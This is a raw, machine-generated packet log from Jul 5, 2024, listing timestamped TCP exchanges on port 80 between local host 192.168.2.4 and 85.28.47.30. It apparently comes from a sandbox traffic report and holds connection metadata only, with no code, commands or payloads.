                                                                Jul 5, 2024 04:36:07.560110092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560123920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560142040 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560146093 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560152054 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560174942 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560185909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560194016 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560199976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560219049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560229063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560233116 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560240984 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560245037 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560264111 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560270071 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560295105 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560308933 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560313940 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560324907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560333967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560347080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560357094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560363054 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560374975 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560390949 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560400009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560411930 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560421944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560434103 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560436010 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560445070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560457945 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560487986 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560538054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560549021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560560942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560575008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560585976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560585976 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560594082 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560599089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560611010 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560626030 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560652018 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560713053 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560724974 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560735941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560748100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560755014 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560761929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560775042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560776949 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560790062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560801029 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560802937 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560830116 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560841084 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560879946 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560890913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560902119 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560914993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560930014 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560930967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560944080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560956001 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560956955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560966015 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560969114 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561012030 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.561024904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561037064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561047077 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561058044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561072111 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561075926 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.561084032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561090946 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.561095953 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561115026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.561142921 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.561167002 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561177969 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561188936 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561202049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561213017 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561216116 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.561230898 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.561259031 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.561290026 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561301947 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561312914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561326981 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561337948 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.561340094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561358929 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.561383963 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.561463118 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561474085 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561485052 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561496019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561502934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.561510086 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561521053 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561525106 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.561532021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561543941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561552048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.561556101 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561569929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561580896 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.561595917 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.561595917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.561616898 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.561635017 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.649869919 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.649900913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.649910927 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650000095 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650011063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650022984 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650037050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650038958 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.650048018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650087118 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.650099993 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.650264025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650310040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650321007 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650331974 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650363922 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.650391102 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.650449038 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650501966 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.650521994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650537968 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650548935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650578976 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.650599957 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.650857925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650870085 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650881052 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650913000 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.650927067 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650939941 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.650945902 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650966883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650975943 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.650979996 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.650991917 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.650995970 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651010990 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.651031017 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.651041031 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.651257992 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651278973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651293039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651303053 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651309967 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.651314974 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651323080 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.651334047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651343107 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.651348114 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651357889 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651370049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651376963 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.651489973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651501894 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651513100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651524067 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651525021 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.651539087 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.651545048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651556969 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651559114 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.651570082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651592016 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.651607990 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.651640892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651653051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651664019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651675940 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651700020 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.651707888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651721001 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651722908 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.651745081 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651756048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651756048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.651792049 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.651792049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651803970 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651814938 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651838064 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.651853085 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.651870012 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651880980 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651891947 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651906013 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651916027 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651921988 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.651952982 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.651959896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651972055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.651983023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652009964 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652023077 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652040958 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652053118 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652082920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652091026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652095079 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652112007 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652124882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652138948 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652143002 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652148008 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652154922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652167082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652177095 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652182102 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652206898 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652214050 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652245045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652256012 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652266979 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652277946 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652292967 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652319908 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652323008 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652333021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652344942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652355909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652388096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652388096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652420998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652431965 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652441025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652451992 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652472019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652479887 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652491093 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652501106 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652506113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652518988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652529001 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652532101 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652554035 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652578115 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652601957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652612925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652623892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652633905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652654886 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652667046 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652712107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652723074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652733088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652746916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652757883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652759075 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652769089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652777910 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652782917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652803898 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652829885 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652862072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652873993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652906895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652919054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652920961 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652930975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652942896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652955055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.652960062 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652967930 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.652992964 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.653000116 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.653007030 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.653043985 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.653047085 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.653058052 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.653068066 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.653079987 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.653090954 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.653093100 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.653106928 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.653157949 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.653191090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.653202057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.653212070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.653223991 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.653234959 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.653243065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.653248072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.653258085 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.653280020 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.653289080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.653300047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.653301001 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.653311014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.653341055 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.653364897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.741771936 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.741806984 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.741816998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.741852999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.741868973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.741880894 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.741897106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.741906881 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.741936922 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.741966963 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.742043018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.742083073 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.742084026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.742094994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.742106915 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.742131948 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.742156029 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.742156029 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.742170095 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.742180109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.742189884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.742208958 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.742240906 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.742599010 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.742618084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.742681026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.742693901 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.742767096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.742778063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.742798090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.742808104 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.742813110 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.742820978 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.742846012 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.742887020 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.742907047 CEST804973085.28.47.30192.168.2.4
